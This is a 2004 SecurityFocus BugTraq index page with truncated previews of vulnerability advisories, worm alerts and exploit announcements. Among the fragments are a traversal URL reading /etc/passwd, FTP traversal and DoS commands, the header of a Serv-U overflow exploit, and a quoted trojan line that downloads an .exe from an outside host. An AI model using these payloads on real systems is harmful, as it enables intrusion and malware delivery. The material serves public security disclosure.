BugTraq Mode:
US CERT Technical Alert TA04-028A MyDoom.B Rapidly Spreading 2004-01-29
CERT Advisory (cert-advisory cert org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

MyDoom.B Rapidly Spreading

Mydoom.B is a new variant of the Mydoom worm and is about 29,184
bytes. This variant attempts to perform a Distributed Denial of
Service (DDoS) attack against Microsoft.com. Details regarding this
new worm are

[HUC] Serv-U FTPD 3.x/4.x "SITE CHMOD" Command remote exploit V2.0 2004-02-02
lion (lion cnhonker net)
/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion (at) cnhonker (dot) net
* : http://

Denial Of Service in ChatterBox 2.0 2004-01-30
Donato Ferrante (fdonato autistici org)
Donato Ferrante

Application: ChatterBox
http://www.urbancities.net/burton/

Version: 2.0

Bug: Denial Of Service

Author: Donato Ferrante
e-mail: fdonato (at) autistici (dot) org
web: www.autistici.org/fdonato

xxx

BUG IN APACHE HTTPD SERVER (current version 2.0.47) 2004-01-31
Vietnamese Security Group (security security com vn)


APACHE HTTPD SERVER (current version 2.0.47):

##########################################################

How to return files in an Apache Deny All directory.

The Directives controlling host access may be bypassed even if they do not have permission to be overridden.

11 Jan 2004

DESCRIPTION

Directory Traversal in Aprox PHP Portal. 2004-01-31
Zero_X www.lobnan.de Team (zero-x linuxmail org)


Directory Traversal in Aprox PHP Portal.

Aprox PHP Portal from www.aprox.de allows viewing all files on the system.

Exploit URL:

http://targethost/index.php?show=/etc/passwd

Zero X member of www.lobnan.de and www.lostkey.org

Symlink Vulnerability in GNU libtool <1.5.2 2004-01-30
Stefan Nordhausen (deletethis nordhaus informatik hu-berlin de)
Vulnerable: libtool <1.5.2
Not Vulnerable: libtool 1.5.2
Project website: http://www.gnu.org/software/libtool/libtool.html

Description of libtool (from website):
"GNU libtool is a generic library support script. Libtool hides the
complexity of using shared libraries behind a consistent, porta

Refuting tall-tales and stories about the Mydoom worms 2004-01-30
Gadi Evron (ge egotistical reprehensible net)
The document contains information and reverse engineering bits of the
Mydoom worms, refuting claims and rumors about them with facts.

It updates http://www.math.org.il/newworm-digest1.txt.

Also, we provide proof within the document of the DDoS attack that many
in the world now report does not ha

Vulnerabilities in Crob FTP Server V3.5.1 2004-02-01
Zero_X www.lobnan.de Team (zero-x linuxmail org)


Vulnerabilities in Crob FTP Server V3.5.1

Directory Disclosure:

You can read all directories on the system.

use this command: dir ../../../../../*

DoS Vulnerability:

use this command:

dir ........................................................................
..................

[FLSA-2004:1222] Updated tcpdump resolves security vulnerabilities (resend with correct paths) 2004-01-31
Jesse Keating (jkeating j2solutions net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date: 2004-01-31
Product

another Trojan with the ADO hole? + a twist in the story 2004-01-31
Gadi Evron (ge egotistical reprehensible net)
The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.

The original sample - britney.jpg - was simply an html file itself, and
using that fact, and IE loading it. It was combined with one of the
latest exploits of the

[SCSA-027] PHP-Nuke 6.9 SQL Injection Vulnerability 2004-02-01
advisory security-corporation com
======================================================================
Security Corporation Security Advisory [SCSA-027]

PHP-Nuke 6.9 SQL Injection Vulnerability
======================================================================

PROGRAM: PHP-Nuke
HOMEPAGE: http://www.phpnuke.org
VULNERABLE VER

[FLSA-2004:1193] Updated ethereal resolves security vulnerabilities 2004-02-01
Jesse Keating (jkeating j2solutions net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated ethereal resolves security vulnerabilities
Advisory ID: FLSA:1193
Issue date: 2004-01-31
Prod

0verkill - little simple vulnerability. 2004-02-02
Adam Zabrocki (pi3ki31ny wp pl)
0verkill - little simple vulnerability.

I. Entry.

The vulnerability is in the game 0verkill. There are some little bugs in the
client / server.

II. Vulnerability details.

a) client:

The vulnerable functions are load_cfg(), save_cfg() and maybe
send_message().
There are simple buffer overflow bugs:

"i

sqwebmail web login 2004-01-31
Marco Marabelli (mm smrt it)

platform:
linux 2.4 i386
packages: qmail+sqwebmail+qmailadmin+vpopmail-vchkpw-auth.

When user root tries logging in on the web at http://domain/cgi-bin/sqwebmail,
and does so with the right root password, sqwebmail gives an error "maildir
doesn't exist or has incorrect ownership or permission". This, O

CoDeX-W0rm - what happened here? 2004-02-01
Chuck Rock (carock epcusa com)
One of my stupid Windows servers has been hacked, and was running Serv-U
FTP with a login message of "This Pubstro Hacked By Mediax!"

I found what Pubstro's are, but when searching through the files in the
Serv-U folder, I found this in the install.log

CoDeX-W0rm has infiltrated the system succesf

Re: Oracle toplink mapping workbench password algorithm 2004-01-28
Martin (broadcast mail ptraced net)
Read the link, really interesting. There's a tiny mistake there tho, on
the example. 97 + 112 does not equal 224, no matter what. I was coding a
PERL script to decrypt the passwords, and I took the 'pa' '74E0'
example, since I was a bit lazy to code a "crypter". Well, here's a PERL
script that will

Re: new WIN virus? 2004-01-29
K-OTiK Security (Special-Alerts k-otik com)
In-Reply-To: <Pine.BSF.4.58.0401290056100.39640 (at) erfrnepu.fhfcvpvbhf (dot) bet>

This is a lame trojan? trying to exploit the Windows Media Player/Internet Explorer vulnerability (greetz to Liu Die Yu)

x.Open("GET", "http://www.****.ru/dan/updatte.exe",0);

[...]

s.SaveToFile("C:\\Program Files\\Window

[SECURITY] [DSA 431-1] New perl packages fix information leak in suidperl 2004-02-01
Matt Zimmerman (mdz debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 431-1 security (at) debian (dot) org
http://www.debian.org/security/ Matt Zimmerman
February 1st, 2004

Web Blog 1.1 Remote Execute Commands Bug 2004-01-29
ActualMInd (actualmind liberdadeaffix org)
Product:
Web Blog 1.1 Remote Execute Commands Bug

Affected Versions:
1.1.5

Bug:
Command Remote Execution

Credits:
n3rd - Lit Security Solutions (LiSS)
#Affix in irc.brasnet.org

Vendor:
http://leifwright.com

Exploiting:
http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&

Copyright 2010, SecurityFocus